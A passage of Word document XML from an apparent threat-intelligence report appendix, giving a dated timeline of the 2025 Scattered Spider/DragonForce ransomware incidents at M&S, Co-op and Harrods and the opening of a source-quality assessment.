      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dbir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD80EB" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F479BED" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc227971094"/>
      <w:bookmarkStart w:id="60" w:name="_Toc228127124"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A: OSINT Notes, Source Assessment, and Supplementary Diagrams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="3718EC61" w14:textId="075A74E4" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc227971095"/>
      <w:bookmarkStart w:id="62" w:name="_Toc228127125"/>
      <w:r>
        <w:t>A.0  Chronological Timelines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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800"/>
        <w:gridCol w:w="5360"/>
        <w:gridCol w:w="800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE46BA" w14:paraId="2F14E439" w14:textId="77777777" w:rsidTr="007A3976">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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0A517CF4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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733364DE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="536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15B19CC0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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59D72E37" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sev.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="00F0DD73"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F843C4B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Feb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F09DE11" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial compromise</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898FD54" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat actors (Scattered Spider) reportedly infiltrate M&amp;S systems — likely via social-engineered helpdesk reset on a third-party IT provider (TCS). </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Active Directory database) stolen.</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003B607A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="6024F04C"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336C2FF0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19–21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877E403" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Customer impact begins</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A7333BD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Easter weekend: contactless payments and Click &amp; Collect fail across M&amp;S stores. Incident initially attributed to 'technical issues'.</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00949BAD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="6285CDA6"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4237326" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>22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F052815" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Public disclosure — M&amp;S</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3DF9F12" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S files stock market disclosure acknowledging 'cyber incident'. NCSC and external IR firms (CrowdStrike/Mandiant) engaged. Customer data initially declared safe.</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14E64F88" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="565E1907"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22F50D1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>23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C3C30E7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Extortion contact</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C2CD2A1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/Scattered Spider contact M&amp;S CEO Stuart Machin via a compromised employee email confirming server encryption.</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7E99339D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="2C101D07"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72F2F948" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>24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E5233E4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware deployed</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29DB207" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransomware detonated on VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> infrastructure. Virtual machines encrypted, automated ordering and stock systems offline.</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56C3AEA7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="639E3C5D"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1365FA7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>25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E002F6F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Online operations suspended</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8287DC9" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S halts all website/app orders; ~200 job listings removed. Signs of empty shelves appear in stores.</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146E3970" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="5D883B4C"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87EA698" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>28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DC9FF78" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Warehouse shutdown</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95A67CD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>~200 agency workers at Castle Donington warehouse sent home. Percy Pigs and other fast-moving lines absent from stores.</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6C4CE8B4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="770F31F3"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E57C0D4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>30 Apr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78D6646" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Co-op incident confirmed</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6995C6E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Co-op confirms 'cyber incident', shuts down parts of IT systems. Metropolitan Police </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>confirms</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> investigation.</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647BA8FF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="77A4B28B"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1CFC2606" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1 May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04B79A4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Co-op internal memo</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A864AAA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Co-op CIO orders VPN suspension for all staff; employees warned attackers may monitor internal comms including Teams.</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4CEB3D8A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="08B874C4"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4626F6B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1 May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F590528" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Harrods confirms attack</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527AC98" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Harrods publicly confirms cyber incident; limited operational impact due to smaller internet-facing footprint.</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7E150D9E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="25976EE5"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7643B2D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>13 May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B3EFB1F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S customer data confirmed stolen</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A34C2EE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S confirms customer PII exfiltrated (names, emails, dates of birth, partial addresses). Payment data and passwords declared safe.</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6527092A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="6C024429"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3D860A7A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>21 May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A4CC881" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S financial impact quantified</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EB4E311" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Annual results: £300 m profit impact forecast. Online clothing/home sales down ~one-third. Website restored read-only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DC2626"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C77D3BA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="2F6E1AB0"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DFDBE93" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10 Jun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A84D39B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Partial ecommerce restoration</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4B6E914" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S resumes online clothing orders after 46-day shutdown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08188334" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="16375363"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E029FA4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8 Jul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5B317EB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parliamentary hearing</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2A954D5" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S Chairman Archie Norman and Co-op CISO testify before UK Business &amp; Trade Sub-Committee, confirming social-engineering initial access vectors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25284DA4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w14:paraId="101FF7D5" w14:textId="77777777" w:rsidTr="007A3976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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386C964" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>29 Jul 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>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44E8E5A8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CISA/NCSC joint advisory</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5BF4030" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CISA, FBI, NCSC, ACSC issue updated Scattered Spider advisory (AA23-320A rev.) detailing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> RaaS partnership and VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> targeting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="050E4955" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="007A3976"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3935A3CC" w14:textId="0C65C3E5" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc228127126"/>
      <w:r>
        <w:t>A.1 Source Quality Assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="59D994A3" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Primary sources for this analysis were evaluated on a three-tier reliability scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B280EA7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60"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5360"/>
      </w:tblGrid>
